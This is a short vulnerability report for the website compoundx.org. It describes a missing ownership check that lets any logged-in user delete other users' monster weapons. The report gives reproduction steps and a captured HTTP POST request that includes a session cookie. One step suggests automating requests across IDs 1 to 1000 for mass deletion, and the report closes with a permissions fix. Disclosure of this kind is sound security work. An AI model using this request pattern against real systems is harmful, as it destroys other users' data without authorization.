Bug allows for deletion of arbitrary enemy weapons from the database

[Turtlelord26]

Impact:
Any user with a valid session cookie can delete any monster from the database, regardless of ownership and privacy settings.

Steps to reproduce:

1. Navigate to https://www.compoundx.org and log in with a valid username and password.
2. Navigate to https://www.compoundx.org/monsterweaponeditor
3. Capture the packet sent by clicking the Delete button next to an enemy on the right sidebar (Shown below).
4. Change the enemy weapon id (§§ in the example packet) to an arbitrary number, or a particular one if you happen to have a particular enemy weapon in mind and know its id.
5. Use automation software to submit packets cycling through monster ids from 1 to 1000 (or however high one prefers) to effect mass deletion.

POST /deletemonsterweapon/§§ HTTP/1.1
Host: www.compoundx.org
Connection: close
Content-Length: 0
Cache-Control: max-age=0
Origin: https://www.compoundx.org
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: https://www.compoundx.org/monsterweapons
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=.eJyrVorQdQ4OclOyqlZSSFKyUorKtTRJ8fAqS3G0tVWq1VFKySwuyEmszEvMTYWrCc51K4mK8AXLF-XnICRC3SsyUsPDKkESpcWpRSi6wjzCKlPcK3KS3C0ro8Cm1wIAWVwmqQ.ESuGcw.YPWCofLDLiYauvgHjieBj5b7FfE

Recommended fix:
Adding in permissions that disallow (non-admin) users from deleting enemy weapons that they did not make would prevent a bad actor with a single (non-admin) cookie from deleting enemy weapons owned by other users.